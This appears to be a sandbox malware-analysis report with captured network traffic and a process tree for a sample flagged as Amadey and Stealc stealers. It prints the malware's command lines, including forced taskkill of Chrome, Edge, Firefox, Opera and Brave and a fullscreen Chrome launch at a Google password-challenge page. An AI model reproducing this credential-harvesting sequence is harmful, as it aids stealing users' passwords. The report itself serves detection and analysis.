                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:21 UTC563INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:21 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1395
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                                                                                                                                      ETag: "0x8DC582BDEC600CC"
                                                                                                                                      x-ms-request-id: 72218525-801e-002a-7701-1731dc000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012321Z-1657d5bbd48p2j6x2quer0q028000000030g000000008s2a
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:21 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 36 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4d 65 64 69 61 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4d 65 64 69
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702651" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Media.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenMedi


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      149192.168.2.46101313.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:21 UTC192OUTGET /rules/rule702251v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:21 UTC563INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:21 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1389
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                      ETag: "0x8DC582BE0F427E7"
                                                                                                                                      x-ms-request-id: de435f0b-f01e-0052-0101-179224000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012321Z-1657d5bbd48wd55zet5pcra0cg00000002vg00000000168f
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:21 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4d 4c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4d 4c 22 20 53 3d 22
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.ML.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenML" S="


                                                                                                                                      Click to jump to process

                                                                                                                                      Click to jump to process

                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                      Click to jump to process

                                                                                                                                      Target ID:0
                                                                                                                                      Start time:21:22:00
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Users\user\Desktop\8ObkdHP9Hq.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\Desktop\8ObkdHP9Hq.exe"
                                                                                                                                      Imagebase:0x880000
                                                                                                                                      File size:1'889'792 bytes
                                                                                                                                      MD5 hash:77B69071CCC75E75A48EA59D48A55A30
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.1710668999.0000000004FC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.1750861605.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:1
                                                                                                                                      Start time:21:22:03
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                                                                                                                      Imagebase:0xda0000
                                                                                                                                      File size:1'889'792 bytes
                                                                                                                                      MD5 hash:77B69071CCC75E75A48EA59D48A55A30
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000002.1787122372.0000000000DA1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000003.1746151860.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      Antivirus matches:
                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                      • Detection: 53%, ReversingLabs
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:5
                                                                                                                                      Start time:21:23:00
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                      Imagebase:0xda0000
                                                                                                                                      File size:1'889'792 bytes
                                                                                                                                      MD5 hash:77B69071CCC75E75A48EA59D48A55A30
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000005.00000002.2955176966.0000000000DA1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000005.00000003.2313808544.0000000004C40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:false

                                                                                                                                      Target ID:6
                                                                                                                                      Start time:21:23:10
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe"
                                                                                                                                      Imagebase:0xb20000
                                                                                                                                      File size:919'040 bytes
                                                                                                                                      MD5 hash:A914737C9AF5014B7CD65B6649094707
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_CredentialFlusher, Description: Yara detected Credential Flusher, Source: 00000006.00000002.2951418045.0000000001088000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      Antivirus matches:
                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                      • Detection: 24%, ReversingLabs
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:false

                                                                                                                                      Target ID:7
                                                                                                                                      Start time:21:23:10
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:taskkill /F /IM chrome.exe /T
                                                                                                                                      Imagebase:0xb40000
                                                                                                                                      File size:74'240 bytes
                                                                                                                                      MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:8
                                                                                                                                      Start time:21:23:10
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                      File size:862'208 bytes
                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:9
                                                                                                                                      Start time:21:23:10
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:taskkill /F /IM msedge.exe /T
                                                                                                                                      Imagebase:0xb40000
                                                                                                                                      File size:74'240 bytes
                                                                                                                                      MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:10
                                                                                                                                      Start time:21:23:10
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                      File size:862'208 bytes
                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:11
                                                                                                                                      Start time:21:23:10
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:taskkill /F /IM firefox.exe /T
                                                                                                                                      Imagebase:0xb40000
                                                                                                                                      File size:74'240 bytes
                                                                                                                                      MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:12
                                                                                                                                      Start time:21:23:10
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                      File size:862'208 bytes
                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:13
                                                                                                                                      Start time:21:23:10
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:taskkill /F /IM opera.exe /T
                                                                                                                                      Imagebase:0xb40000
                                                                                                                                      File size:74'240 bytes
                                                                                                                                      MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:14
                                                                                                                                      Start time:21:23:10
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                      File size:862'208 bytes
                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:15
                                                                                                                                      Start time:21:23:10
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:taskkill /F /IM brave.exe /T
                                                                                                                                      Imagebase:0xb40000
                                                                                                                                      File size:74'240 bytes
                                                                                                                                      MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:16
                                                                                                                                      Start time:21:23:10
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                      File size:862'208 bytes
                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:17
                                                                                                                                      Start time:21:23:12
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --start-fullscreen --no-first-run --disable-session-crashed-bubble --disable-infobars
                                                                                                                                      Imagebase:0x7ff76e190000
                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:false

                                                                                                                                      Target ID:19
                                                                                                                                      Start time:21:23:12
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2384 --field-trial-handle=2240,i,13949646483110312368,15407111442915167702,262144 /prefetch:8
                                                                                                                                      Imagebase:0x7ff76e190000
                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:false

                                                                                                                                      Target ID:20
                                                                                                                                      Start time:21:23:14
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\1000336001\num.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\1000336001\num.exe"
                                                                                                                                      Imagebase:0xb80000
                                                                                                                                      File size:314'368 bytes
                                                                                                                                      MD5 hash:791FCEE57312D4A20CC86AE1CEA8DFC4
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000014.00000000.2430826993.0000000000B81000.00000080.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000014.00000002.2442698783.0000000000E8E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000014.00000002.2442182169.0000000000B81000.00000080.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe, Author: Joe Security
                                                                                                                                      Antivirus matches:
                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                      • Detection: 83%, ReversingLabs
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:21
                                                                                                                                      Start time:21:23:19
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe"
                                                                                                                                      Imagebase:0xf50000
                                                                                                                                      File size:1'829'376 bytes
                                                                                                                                      MD5 hash:86FEA273D36E3F9C8221E22B937B1929
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Antivirus matches:
                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                      • Detection: 29%, ReversingLabs
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:23
                                                                                                                                      Start time:21:23:23
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5648 --field-trial-handle=2240,i,13949646483110312368,15407111442915167702,262144 /prefetch:8
                                                                                                                                      Imagebase:0x7ff76e190000
                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:24
                                                                                                                                      Start time:21:23:23
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5808 --field-trial-handle=2240,i,13949646483110312368,15407111442915167702,262144 /prefetch:8
                                                                                                                                      Imagebase:0x7ff76e190000
                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:25
                                                                                                                                      Start time:21:23:24
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe"
                                                                                                                                      Imagebase:0xb20000
                                                                                                                                      File size:919'040 bytes
                                                                                                                                      MD5 hash:A914737C9AF5014B7CD65B6649094707
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_CredentialFlusher, Description: Yara detected Credential Flusher, Source: 00000019.00000002.2953823488.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      Has exited:false

                                                                                                                                      Target ID:26
                                                                                                                                      Start time:21:23:24
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:taskkill /F /IM chrome.exe /T
                                                                                                                                      Imagebase:0xb40000
                                                                                                                                      File size:74'240 bytes
                                                                                                                                      MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:27
                                                                                                                                      Start time:21:23:24
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                      File size:862'208 bytes
                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:28
                                                                                                                                      Start time:21:23:24
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:taskkill /F /IM msedge.exe /T
                                                                                                                                      Imagebase:0xb40000
                                                                                                                                      File size:74'240 bytes
                                                                                                                                      MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:29
                                                                                                                                      Start time:21:23:24
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                      File size:862'208 bytes
                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:30
                                                                                                                                      Start time:21:23:25
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5800 --field-trial-handle=2240,i,13949646483110312368,15407111442915167702,262144 /prefetch:8
                                                                                                                                      Imagebase:0x7ff76e190000
                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:31
                                                                                                                                      Start time:21:23:25
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:taskkill /F /IM firefox.exe /T
                                                                                                                                      Imagebase:0xb40000
                                                                                                                                      File size:74'240 bytes
                                                                                                                                      MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:32
                                                                                                                                      Start time:21:23:25
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                      File size:862'208 bytes
                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:33
                                                                                                                                      Start time:21:23:25
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:taskkill /F /IM opera.exe /T
                                                                                                                                      Imagebase:0xb40000
                                                                                                                                      File size:74'240 bytes
                                                                                                                                      MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:34
                                                                                                                                      Start time:21:23:25
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                      File size:862'208 bytes
                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

